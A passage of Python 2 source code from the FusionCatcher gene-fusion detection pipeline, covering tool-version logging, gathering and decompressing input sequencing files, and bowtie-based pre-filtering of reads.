sys.exit(1) os.remove(outdir('star_version.txt')) # save version of BOWTIE2 used to analyze the data job.add('printf',kind='program') job.add('"\n\nBOWTIE2:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_B2_+'bowtie2',kind='program') job.add('--version',kind='parameter') job.add('2>&1',kind='parameter') job.add('|',kind='parameter') job.add('head','-2',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message = ("Please, check if BOWTIE2 (from "+ "<http://bowtie-bio.sourceforge.net/bowtie2/index.shtml> "+ "is installed correctly and it "+ "is in the corresponding PATH (or if 'configuration.cfg' file is "+ "set up correctly)!\n If there is no wish to use BOWTIE2 aligner then please "+ "(re)run FusionCatcher using command line option '--skip-bowtie2'.")) # if not options.skip_bwa: # # save version of BWA used to analyze the data # job.add('printf',kind='program') # job.add('"\n\nBWA:\n------\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add(_BA_+'bwa',kind='program') # job.add('2>&1',kind='parameter') # job.add('|',kind='parameter') # job.add('head','-3',kind='parameter') # job.add('|',kind='parameter') # job.add('tail','-1',kind='parameter') # job.add('>>',info_file,kind='output') # job.run(error_message = ("Please, check if BWA (from "+ # "<http://bio-bwa.sourceforge.net/> "+ # "is installed correctly and it "+ # "is in the corresponding PATH (or if 'configuration.cfg' file is "+ # "set up correctly)!\n If there is no wish to use BWA aligner then please "+ # "(re)run FusionCatcher using command line option '--skip-bwa'.")) if options.assembly: # save version of VELVET used to analyze the data job.add('printf',kind='program') job.add('"\nVELVET:\n------\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add(_VT_+'velvetg',kind='program') job.add('|',kind='parameter') job.add('head','-2',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message = ("Please, check if VELVETT (from "+ "<http://www.ebi.ac.uk/~zerbino/velvet/>)"+ "is installed and it "+ "is in the corresponding PATH!")) job.add(_VT_+'velveth',kind='program') job.add('|',kind='parameter') job.add('head','-2',kind='parameter') job.add('>>',info_file,kind='output') job.run(error_message = ("Please, check if VELVETT (from "+ "<http://www.ebi.ac.uk/~zerbino/velvet/>)"+ "is installed and it "+ "is in the corresponding PATH!")) # save the command line arguments again job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() if job.run(): clo = [ el + ' = ' + str(getattr(options,el))+'\n' for el in dir(options) if (not el.startswith('_')) and type(getattr(options,el)).__name__ in ('str','bool','int','float')] clo.append("main_script = " + expand(sys.argv[0])+'\n') clo.append("main_script_version = " + version.replace('%prog','').strip() +'\n') clo.insert(0,"Pipeline parameters:\n") clo.insert(1,"====================\n") clo.append("\n") clo.append("Current working directory:\n---------------------------\n%s\n" % (expand(os.getcwd()),)) clo.append("\n") clo.append("Command line used for launching FusionCatcher:\n") clo.append("----------------------------------------------\n") clo.append("%s\n" % (' \\ \n'.join(sys.argv),)) clo.append("----------------------------------------------\n") clo.append("\n\n\n") clo.append("Shebang for Python scripts:\n") clo.append("---------------------------\n") clo.append(file(expand(sys.argv[0]),'r').readline()+"\n") clo.append("\n\n\n") file(info_file,'a').writelines(clo) clo = [] clo.append("#!/usr/bin/env bash\n") clo.append("cd '%s'\n" % (os.getcwd(),)) clo.append("\n") clo.append("%s\n" % (' \\\n'.join(sys.argv),)) clo.append("\n") file(outdir('restart.sh'),'w').writelines(clo) os.system("chmod u+x '%s'" % (outdir('restart.sh'),)) info(job, fromfile = configfile, tofile = info_file, top = ["===================", "CONFIGURATION.CFG:", "==================="], bottom = "\n\n\n") if islink(data_dir): job.add('printf',kind='program') job.add('"\n============\nDATA DIRECTORY:\n============\n%s\nIt links to:\n%s\n\n\n"' % (data_dir,expand(os.readlink(data_dir[:-1] if data_dir.endswith(os.sep) else data_dir))),kind='parameter') job.add('>>',info_file,kind='output') job.run() else: job.add('printf',kind='program') job.add('"\n============\nDATA DIRECTORY:\n============\n%s\nIt is not a link!\n\n\n"' % (data_dir,),kind='parameter') job.add('>>',info_file,kind='output') job.run() if job.run(): # test that the version of build data matches build_version = file(datadir('version.txt'),'r').readline().strip() build_version = build_version.lower().split('.py') old_build_version = 'fusioncatcher-build.py 0.99.3d beta--------' old_build_version = old_build_version.lower().split('.py') pipeline_version = parser.get_version() pipeline_version = pipeline_version.lower().strip().split('.py') if len(pipeline_version) > 1 and len(build_version) > 1 and (build_version[1].strip() == pipeline_version[1].strip() or old_build_version[1].strip() == build_version[1].strip()): print "Version of the data build matches the version of pipeline version!" else: job.close() print >>sys.stderr,"...................." print >>sys.stderr,"ERROR: The version of the data build does not match the version of this pipeline!" print >>sys.stderr,"Please, run again the 'fusioncatcher-build.py' in order to fix this!" print >>sys.stderr,"...................." sys.exit(1) # find available memory job.add('printf',kind='program') job.add('"\n============\nMEMORY:\n============\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('free',kind='program') job.add('-m',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\nTotal installed RAM memory = %d MB"' % (total_memory,),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\n\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() ############################################################################## # STARTING with the input ############################################################################## if options.input_filename.endswith(','): job.close() print >>sys.stderr,"ERROR: The input list of files is ending with a comma!" print >>sys.stderr,"Please, remove the comma from the end of the list of files " print >>sys.stderr,"or check that there are no blanks, tabs, or spaces after the comma" print >>sys.stderr,"and re-run FusionCatcher from the very beggining!" sys.exit(1) list_input_files = sorted([expand(el.strip('"').strip("'")) if el.find('://') == -1 else el.strip('"').strip("'") for el in options.input_filename.split(',') if el]) f = [] urls = [] new_input_output = outdir('input/') for element in list_input_files: if os.path.isdir(element): print "The input '%s' is a directory..." % (element,) f.extend([os.path.join(element,el) for el in os.listdir(element)]) elif element.find('http://') != -1 or element.find('https://') != -1 or element.find('ftp://') != -1 or element.find('ssh://') != -1: if not os.path.isdir(new_input_output): os.makedirs(new_input_output) if element.find('ssh://') != -1: #scp -r user@your.server.example.com:/path/to/foo /home/user/Desktop/ job.add('scp',kind='program') job.add('-r',kind='parameter') job.add('',element.replace('ssh://',''),kind='parameter') job.add('',new_input_output,kind='output') job.run() else: job.add('wget',kind='program') job.add('--no-check-certificate',kind='parameter') if element.endswith('/') or element.endswith(os.sep): job.add('-r',kind='parameter') job.add('-nd',kind='parameter') job.add('-np',kind='parameter') job.add('-A','fq,fastq,fq.gz,fastq.gz,fq.zip,fastq.zip,fq.gz,fastq.bz2,sra,fastq.xz,fq.xz',kind='parameter') job.add('',element,kind='parameter') job.add('-P',new_input_output,kind='output') job.run() else: f.append(element) if os.path.isdir(new_input_output): urls1 = [os.path.join(new_input_output,el) for el in os.listdir(new_input_output) if os.path.isfile(os.path.join(new_input_output,el)) and not el.startswith('.')] f.extend(urls1) urls.extend(urls1) urls2 = [os.path.join(new_input_output,el) for el in os.listdir(new_input_output) if os.path.isdir(os.path.join(new_input_output,el)) and not el.startswith('.')] for elx in urls2: urls3 = [os.path.join(elx,el) for el in os.listdir(elx) if os.path.isfile(os.path.join(elx,el)) and not el.startswith('.')] f.extend(urls3) urls.extend(urls3) list_input_files = [el for el in f if is_known_extension(el) and (not empty(el)) and (not el.startswith('.'))] list_input_files = list(set(list_input_files)) list_input_files.sort() job.write(["Input files (which contain the short reads):"]+list_input_files) info(job, fromfile = None, tofile = info_file, top = ["", "Input files (which contain the short reads):", "--------------------------------------------"]+list_input_files, bottom = "\n\n\n", temp_path=temp_flag) # job.add('printf',kind='program') # job.add('"\n============\nInput files:\n============\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # for el in list_input_files: # job.add('printf',kind='program') # job.add('"%s\n"' % (el,),kind='parameter') # job.add('>>',info_file,kind='output') # job.run() # job.add('printf',kind='program') # job.add('"\n\n\n"',kind='parameter') # job.add('>>',info_file,kind='output') # job.run() if len(list_input_files) < 1: job.close() print >>sys.stderr,"\n\n\nERROR: No input valid files have been found (given input is: '%s' )!\n" % (options.input_filename,) sys.exit(1) # protect the input files by accidental deletion job.protect(list_input_files) # handle the SRA files new_list_input_files = [] i = 0 for input_file in list_input_files: if input_file.endswith(".sra"): i = i + 1 outfile1 = outdir(os.path.basename(input_file)[:-4]+'_1.fastq') outfile2 = outdir(os.path.basename(input_file)[:-4]+'_2.fastq') job.add(_SA_+'fastq-dump',kind='program') job.add('--split-files',kind='parameter') job.add('',input_file,kind='input') job.add('-O',out_dir,kind='output',checksum='no') job.add('',outfile1,kind='output',command_line='no') job.add('',outfile2,kind='output',command_line='no') if job.run(error_message=("Please, check if 'fastq-dump' (from NCBI SRA "+ "Toolgit <http://www.ncbi.nlm.nih.gov/Traces/sra/?view=software>) "+ "is installed and it is in the corresponding PATH!")): # test if there are indeed two output files if empty(outfile2): job.write("\n\n\nERROR: The SRA input file '%s' does not contain paired-end reads!\n\n\n" % (input_file,),stderr=True) job.close() sys.exit(1) outfile3 = outdir(os.path.basename(input_file)[:-4]+'_1.fq') outfile4 = outdir(os.path.basename(input_file)[:-4]+'_2.fq') job.add(_FC_+'sra2illumina.py',kind='program') #job.add('--tag_read_name','Z'+str(i)+'Z',kind='parameter') job.add('--input_1',outfile1,kind='input',temp_path=temp_flag) job.add('--input_2',outfile2,kind='input',temp_path=temp_flag) job.add('--output_1',outfile3,kind='output') job.add('--output_2',outfile4,kind='output') job.add('--link','change',kind='parameter') job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') job.run() new_list_input_files.append(outfile3) new_list_input_files.append(outfile4) elif input_file.endswith(".bam") or input_file.endswith(".sam"): i = i + 1 outfile1 = outdir(os.path.basename(input_file)[:-4]+'_1.fq') outfile2 = outdir(os.path.basename(input_file)[:-4]+'_2.fq') # job.add('samtools',kind='program') # job.add('view',input_file,kind='input') # job.add('|',kind='parameter') # ## job.add('grep',kind='parameter') # ## job.add('-v','^@',kind='parameter') # ## job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('sort',kind='parameter') # job.add('-t',"'\t'",kind='parameter') # job.add('-k','1,1',kind='parameter') # if sort_buffer: # job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') # if sort_parallel: # job.add('--parallel',options.processes,kind='parameter',checksum='no') # if sort_lzop_compress: # job.add('--compress-program','lzop',kind='parameter',checksum='no') # elif sort_gzip_compress: # job.add('--compress-program','gzip',kind='parameter',checksum='no') # job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('awk',kind='parameter') # job.add("""-F"\\\\t" '{if ( $1==old1 ) { print "@"$1"\\n"$10"\\n+\\n"$11 > "%s"; print "@"old1"\\n"old10"\\n+\\n"old11 > "%s"; old1="" }; {old1=$1; old10=$10; old11=$11}; }'""" % (outfile1,outfile2),kind='parameter') # ## job.add("""-F"\\\\t" '{if ( $1==old ) { print old0"\\n"$0; old="" }; {old=$1; old0=$0}; }'""",kind='parameter') # ## job.add('|',kind='parameter') # ## job.add('awk',kind='parameter') # ## job.add("""'{if(NR%%2==0) {print "@"$1"\\n"$10"\\n+\\n"$11 > "%s.fq"} else {print "@"$1"\\n"$10"\\n+\\n"$11 > "%s.fq"}}'""" % (outfile1,outfile2),kind='parameter') # job.add('',outfile1,kind='output',command_line='no') # job.add('',outfile2,kind='output',command_line='no') # job.run() # #cat H716.sam | awk 'NR%2==0 {print "@"$1"\n"$10"\n+\n"$11}' > 1.fq # #cat H716.sam | awk 'NR%2==1 {print "@"$1"\n"$10"\n+\n"$11}' > 2.fq # # java -jar SamToFastq.jar INPUT=G28616.NCI-H2228.1.bam F=r1.fq F2=r2.fq NON_PF=True # job.add(_JA_+'java',kind='program') job.add('-jar',os.path.join(_PD_,'picard.jar'),kind='parameter') job.add('SamToFastq',kind='parameter') job.add('NON_PF=','True',kind='parameter',space='no') job.add('INPUT=',input_file,kind='input',space='no') job.add('F=',outfile1,kind='output',space='no') job.add('F2=',outfile2,kind='output',space='no') job.run() new_list_input_files.append(outfile1) new_list_input_files.append(outfile2) else: new_list_input_files.append(input_file) list_input_files = new_list_input_files[:] if options.prefilter == "1": if options.single_end: options.prefilter == "3" else: new_list_input_files = [] pairs = [(list_input_files[i-1],list_input_files[i]) for i in xrange(1,len(list_input_files),2)] i = -1 for (f,r) in pairs: i = i + 1 # ft2 = outdir("box-%d.fq" % (i,)) f2 = outdir("box-%d_1.fq" % (i,)) r2 = outdir("box-%d_2.fq" % (i,)) ft3 = outdir("blox-%d.fq" % (i,)) f3 = outdir("blox-%d_1.fq" % (i,)) r3 = outdir("blox-%d_2.fq" % (i,)) fastlen = outdir("fast-len-%d.txt" % (i,)) if f.lower().endswith('.fastq.gz') or f.lower().endswith('.fq.gz') or f.lower().endswith('.fastq') or f.lower().endswith('.fq'): use_seed = True if use_seed: # get the reads length! job.add('head',kind='program') job.add('-c','4000',kind='parameter') job.add('',f,kind='input') job.add('|',kind='parameter') job.add('gzip',kind='parameter') job.add('--force',kind='parameter') job.add('--decompress',kind='parameter') job.add('--stdout',kind='parameter') job.add('2>/dev/null',kind='parameter') job.add('|',kind='parameter') job.add('head',kind='parameter') job.add('-16',kind='parameter') job.add('|',kind='parameter') job.add('paste',kind='parameter') job.add('- - - -',kind='parameter') job.add('|',kind='parameter') job.add('cut',kind='parameter') job.add('-f','2',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{ if (length($0) > longest) longest = length($0); } END { print longest }'""",kind='parameter') job.add('>',fastlen,kind='output') job.run() fast_len_reads = 0 if job.run(): if os.path.exists(outdir(fastlen)): fast_len_reads = int(float(file(fastlen,'r').readline().rstrip())) if options.reads and options.reads > 1: # map reads on transcriptome for fast filtering job.add(_SK_+'seqtk',kind='program') job.add('mergepe',kind='parameter') job.add('',f,kind='input') job.add('',r,kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('head',kind='parameter') job.add('-n',4*options.reads,kind='parameter') job.add('|',kind='parameter') job.add(_BE_+'bowtie',kind='parameter') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('--seedmms','1',kind='parameter') # options.mismatches job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments. job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if fast_len_reads > 80: job.add('--trim5','10',kind='parameter') # trim the 10 job.add('--seedlen','60',kind='parameter') elif fast_len_reads > 74: job.add('--trim5','7',kind='parameter') # trim the 10 job.add('--seedlen',60,kind='parameter') elif fast_len_reads > 59: job.add('--trim5','5',kind='parameter') # trim the 10 job.add('--seedlen','53',kind='parameter') elif fast_len_reads > 49: job.add('--trim5','5',kind='parameter') # trim the 10 job.add('--seedlen',40,kind='parameter') else: job.add('--trim5','2',kind='parameter') # trim the 10 job.add('--seedlen','40',kind='parameter') job.add('--un',ft3,kind='output',checksum='no') # unmapped reads job.add('--un',f3,kind='output',command_line='no') # unmapped reads job.add('--un',r3,kind='output',command_line='no') # unmapped reads job.add('--max',"/dev/null",kind='parameter') # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('--interleaved','-',kind='input') job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_superfast-prefiltering-transcriptome.stdout.txt'),kind='output',checksum='no') job.run() else: # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('--seedmms','1',kind='parameter') # options.mismatches job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments. job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') # job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') if fast_len_reads > 80: job.add('--trim5','10',kind='parameter') # trim the 10 job.add('--seedlen','60',kind='parameter') elif fast_len_reads > 74: job.add('--trim5','7',kind='parameter') # trim the 10 job.add('--seedlen',60,kind='parameter') elif fast_len_reads > 59: job.add('--trim5','5',kind='parameter') # trim the 10 job.add('--seedlen','53',kind='parameter') elif fast_len_reads > 49: job.add('--trim5','5',kind='parameter') # trim the 10 job.add('--seedlen',40,kind='parameter') else: job.add('--trim5','2',kind='parameter') # trim the 10 job.add('--seedlen','40',kind='parameter') job.add('--un',ft3,kind='output',checksum='no') # unmapped reads job.add('--un',f3,kind='output',command_line='no') # unmapped reads job.add('--un',r3,kind='output',command_line='no') # unmapped reads job.add('--max',"/dev/null",kind='parameter') # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',f,kind='input') job.add('-2',r,kind='input') job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_superfast-prefiltering-transcriptome.stdout.txt'),kind='output',checksum='no') job.run() # # map reads on transcriptome for fast filtering # job.add(_BE_+'bowtie',kind='program') # job.add('--seed',bowtie_seed,kind='parameter') # job.add('-t',kind='parameter') # job.add('--seedmms','1',kind='parameter') # options.mismatches # job.add('--seedlen',options.trim_3end_keep,kind='parameter') # job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments. # job.add('-p',options.processes,kind='parameter',checksum='no') # job.add('-k','1',kind='parameter') # job.add('--phred33-quals',kind='parameter') # # job.add('--tryhard',kind='parameter') # job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # # job.add('--best',kind='parameter') # #job.add('--strata',kind='parameter') # #job.add('--trim5','15',kind='parameter') # trim the 10 # job.add('--un',ft3,kind='output',checksum='no') # unmapped reads # job.add('--un',f3,kind='output',command_line='no') # unmapped reads # job.add('--un',r3,kind='output',command_line='no') # unmapped reads # job.add('--max',"/dev/null",kind='parameter') # if this is missing then these reads are going to '--un' # if os.path.isfile(datadir('genome_index2','.1.ebwtl')): # job.add('--large-index',kind='parameter') # job.add('',datadir('genome_index2/index'),kind='input') # job.add('-1',f2,kind='input',temp_path=temp_flag) # job.add('-2',r2,kind='input',temp_path=temp_flag) # job.add('','/dev/null',kind='parameter') # job.add('2>',outdir('log_superfast-prefiltering-genome.stdout.txt'),kind='output',checksum='no') # job.run() else: # this was the original one # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('-v','1',kind='parameter') # options.mismatches # job.add('-X','800',kind='parameter') job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments. job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') # job.add('--tryhard',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') # job.add('--best',kind='parameter') #job.add('--strata',kind='parameter') job.add('--un',tz,kind='output',checksum='no') # unmapped reads job.add('--un',t1z,kind='output',command_line='no') # unmapped reads job.add('--un',t2z,kind='output',command_line='no') # unmapped reads job.add('--max','/dev/null',kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_genes_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',f,kind='input',temp_path=temp_flag) job.add('-2',r,kind='input',temp_path=temp_flag) job.add('','/dev/null',kind='output',temp_path=temp_flag) job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() info(job, fromfile = fastlen, tofile = info_file, top = ["Longest read (fast computation)", "--------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) info(job, fromfile = outdir('log_superfast-prefiltering-transcriptome.stdout.txt'), tofile = info_file, top = ["Super fast pre-filtering -- transcriptome:", "------------------------------------------"], bottom = "\n\n\n", temp_path=temp_flag) # info(job, # fromfile = outdir('log_superfast-prefiltering-genome.stdout.txt'), # tofile = info_file, # top = ["Super fast pre-filtering -- genome:", # "------------------------------------------"], # bottom = "\n\n\n", # temp_path=temp_flag) else: job.link(f, f3, temp_path=temp_flag) job.link(r, r3, temp_path=temp_flag) new_list_input_files.append(f3) new_list_input_files.append(r3) list_input_files = new_list_input_files[:] shuffled = False new_list_input_files = [] for i,input_file in enumerate(list_input_files): output_file = None if input_file.lower().endswith('.gz') and (not input_file.lower().endswith('.tar.gz')): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)[:-3]) # decompress if pigz: job.add(_PZ_+'pigz',kind='program') job.add('-p',options.processes,kind='parameter',checksum='no') else: job.add('gzip',kind='program') job.add('-d',kind='parameter') job.add('-f',kind='parameter') job.add('-c',kind='parameter') job.add('',input_file,kind='input') job.add('>',output_file,kind='output') job.run() elif input_file.lower().endswith('.xz'): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)[:-3]) # decompress # decompress if pxz: job.add('pxz',kind='program') job.add('-T',options.processes,kind='parameter',checksum='no') else: job.add('xz',kind='program') job.add('-dc',kind='parameter') job.add('',input_file,kind='input') job.add('>',output_file,kind='output') job.run() elif input_file.lower().endswith('.zip'): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)[:-4]) # decompress job.add('unzip',kind='program') job.add('-p',kind='parameter') job.add('-o',kind='parameter') job.add('',input_file,kind='input') job.add('>',output_file,kind='output') job.run() elif input_file.lower().endswith('.bz2') and (not input_file.lower().endswith('.tar.bz2')): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)[:-4]) # decompress job.add('bzip2',kind='program') job.add('-d',kind='parameter') job.add('-f',kind='parameter') job.add('-c',kind='parameter') job.add('',input_file,kind='input') job.add('>',output_file,kind='output') job.run() elif ( input_file.lower().endswith('.fq') or input_file.lower().endswith('.fastq')): output_file = outdir('init-'+str(i)+'_'+os.path.basename(input_file)) # link job.link(input_file, output_file, temp_path=temp_flag) else: print >> sys.stderr,"ERROR: unknown extension of the input file! '%s'" % (input_file,) print >> sys.stderr,"Supported extension files are:" print >> sys.stderr," .fastq," print >> sys.stderr," .fq," print >> sys.stderr," .txt.zip," print >> sys.stderr," .fastq.zip," print >> sys.stderr," .fq.zip," print >> sys.stderr," .txt.gz," print >> sys.stderr," .fastq.gz," print >> sys.stderr," .fq.gz," print >> sys.stderr," .txt.bz2," print >> sys.stderr," .fastq.bz2," print >> sys.stderr," .fq.bz2," print >> sys.stderr," .fastq.xz," print >> sys.stderr," .fq.xz," print >> sys.stderr," .bam," print >> sys.stderr," .sam" sys.exit(1) new_list_input_files.append(output_file) list_input_files = new_list_input_files[:] if options.single_end and list_input_files: # single-end reads new_list_input_files = [] for i,input_file in enumerate(list_input_files): output_file_1 = outdir('single-1-'+str(i)+'_'+os.path.basename(input_file)) output_file_2 = outdir('single-2-'+str(i)+'_'+os.path.basename(input_file)) if options.skip_fastqtk: #compute the read lengths for the input file job.add(_FC_+'lengths_reads.py',kind='program') job.add('--input',input_file,kind='input') job.add('--output',outdir('single','log_lengths_single_reads_%s.txt' % (str(i),)),kind='output') job.run() else: job.add(_FK_+'fastqtk',kind='program') job.add('lengths',kind='parameter') job.add('',input_file,kind='input') job.add('',outdir('single','log_lengths_single_reads_%s.txt' % (str(i),)),kind='output') job.run() max_len_reads = 0 if os.path.exists(outdir('single','log_lengths_single_reads_%s.txt' % (str(i),))): max_len_reads = int(float(file(outdir('single','log_lengths_single_reads_%s.txt' % (str(i),)),'r').readline().rstrip())) if not options.bridges: options.bridges = int(math.ceil(float(max_len_reads)/float(160))) if max_len_reads < options.sonication: print >> sys.stderr,"ERROR: The input single-end reads are too short to be used by FusionCatcher!" sys.exit(1) use_fragment = False if use_fragment: job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-q','0.25',kind='parameter') job.add('',input_file,kind='input',temp_path=temp_flag) job.add('>',outdir('single-read--%d.fq' %(i,)),kind='output') job.run() job.add(_FC_+'fragment_fastq.py',kind='program') job.add('-1',outdir('single-read--%d.fq' %(i,)),kind='input',temp_path=temp_flag) job.add('-2','-',kind='parameter') job.add('-f',output_file_1,kind='output') job.add('-r',output_file_2,kind='output') job.add('--window-size',options.trim_psl_3end_keep,kind='parameter') job.add('--step-size',options.trim_psl_3end_keep-2*length_anchor_minimum+1,kind='parameter') job.add('--threshold-read',options.trim_psl_3end_keep + 10,kind='parameter') job.add('--anchors',options.bridges,kind='parameter') job.add('--skip-short',options.trim_3end_keep,kind='parameter') job.add('--trim-n',kind='parameter') job.run() fragments_flag = True else: job.add(_SK_+'seqtk',kind='program') job.add('trimfq',kind='parameter') job.add('-q','0.25',kind='parameter') job.add('',input_file,kind='input',temp_path=temp_flag) job.add('>',output_file_1,kind='output') job.run() job.add(_SK_+'seqtk',kind='program') job.add('seq',kind='parameter') job.add('-r',kind='parameter') job.add('',output_file_1,kind='input') job.add('>',output_file_2,kind='output') job.run() new_list_input_files.append(output_file_1) new_list_input_files.append(output_file_2) list_input_files = new_list_input_files[:] nif = len(list_input_files) if nif == 0: print >> sys.stderr,"ERROR: No input files found!" sys.exit(1) elif nif == 1 or options.skip_interleave_processing: pass else: #list_input_files = new_list_input_files[:] new_list_input_files = [] pairs = [(list_input_files[i-1],list_input_files[i]) for i in xrange(1,len(list_input_files),2)] i = -1 final_i = i for (f,r) in pairs: i = i + 1 # automatically remove adapters output_1_file = outdir(os.path.basename(f).replace('init-','init-noadapt-')) output_2_file = outdir(os.path.basename(r).replace('init-','init-noadapt-')) job.add('printf',kind='program') job.add('"\n\nFirst 8 lines of input FASTQ file: %s\n-------------------------\n"' % (r,),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('head',kind='program') job.add('-8',r,kind='input') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\nFirst 8 lines of input FASTQ file: %s\n-------------------------\n"' % (f,),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('head',kind='program') job.add('-8',f,kind='input') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\nLast 8 lines of input FASTQ file: %s\n-------------------------\n"' % (r,),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('tail',kind='program') job.add('-8',r,kind='input') job.add('>>',info_file,kind='output') job.run() job.add('printf',kind='program') job.add('"\n\nLast 8 lines of input FASTQ file: %s\n-------------------------\n"' % (f,),kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('tail',kind='program') job.add('-8',f,kind='input') job.add('>>',info_file,kind='output') job.run() if options.single_end: job.link(f,output_1_file,temp_path=temp_flag) job.link(r,output_2_file,temp_path=temp_flag) if options.prefilter == "2": options.prefilter = "3" else: # pre-filter before the reads BEFORE are trimmed and evaluated if options.prefilter == "2": f2 = outdir(os.path.basename(f).replace('init-','init-super-')) r2 = outdir(os.path.basename(r).replace('init-','init-super-')) tz = outdir('sf%d.fq' % (i,)) t1z = outdir('sf%d_1.fq' % (i,)) t2z = outdir('sf%d_2.fq' % (i,)) fastlen = outdir("fast-lengths-%d.txt" % (i,)) use_seed = True if use_seed: job.add('head',kind='program') job.add('-c','4000',kind='parameter') job.add('',f,kind='input') job.add('|',kind='parameter') job.add('gzip',kind='parameter') job.add('--force',kind='parameter') job.add('--decompress',kind='parameter') job.add('--stdout',kind='parameter') job.add('2>/dev/null',kind='parameter') job.add('|',kind='parameter') job.add('head',kind='parameter') job.add('-16',kind='parameter') job.add('|',kind='parameter') job.add('paste',kind='parameter') job.add('- - - -',kind='parameter') job.add('|',kind='parameter') job.add('cut',kind='parameter') job.add('-f','2',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',kind='parameter') job.add("""'{ if (length($0) > longest) longest = length($0); } END { print longest }'""",kind='parameter') job.add('>',fastlen,kind='output') job.run() fast_len_reads = 0 if job.run(): if os.path.exists(outdir(fastlen)): fast_len_reads = int(float(file(fastlen,'r').readline().rstrip())) # map reads on transcriptome for fast filtering job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') job.add('-t',kind='parameter') job.add('--seedmms','1',kind='parameter') # options.mismatches job.add('-X','100000',kind='parameter') # The maximum insert size for valid paired-end alignments. job.add('-p',options.processes,kind='parameter',checksum='no') job.add('-k','1',kind='parameter') job.add('--phred33-quals',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if fast_len_reads > 80: job.add('--trim5','10',kind='parameter') # trim the 10 job.add('--seedlen','60',kind='parameter') elif fast_len_reads > 74: job.add('--trim5','7',kind='parameter') # trim the 10 job.add('--seedlen',60,kind='parameter') elif fast_len_reads > 59: job.add('--trim5','5',kind='parameter') # trim the 10 job.add('--seedlen','53',kind='parameter') elif fast_len_reads > 49: job.add('--trim5','5',kind='parameter') # trim the 10 job.add('--seedlen',40,kind='parameter') else: job.add('--trim5','2',kind='parameter') # trim the 10 job.add('--seedlen','40',kind='parameter') job.add('--un',tz,kind='output',checksum='no') # unmapped reads job.add('--un',t1z,kind='output',command_line='no') # unmapped reads job.add('--un',t2z,kind='output',command_line='no') # unmapped reads job.add('--max',"/dev/null",kind='parameter') # if this is missing then these reads are going to '--un' if os.path.isfile(datadir('transcripts_index','.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('',datadir('transcripts_index/'),kind='input') job.add('-1',f,kind='input',temp_path=temp_flag) job.add('-2',r,kind='input',temp_path=temp_flag) job.add('','/dev/null',kind='parameter') job.add('2>',outdir('log_fast-filtering.stdout.txt'),kind='output',checksum='no') job.run() else: # this was the 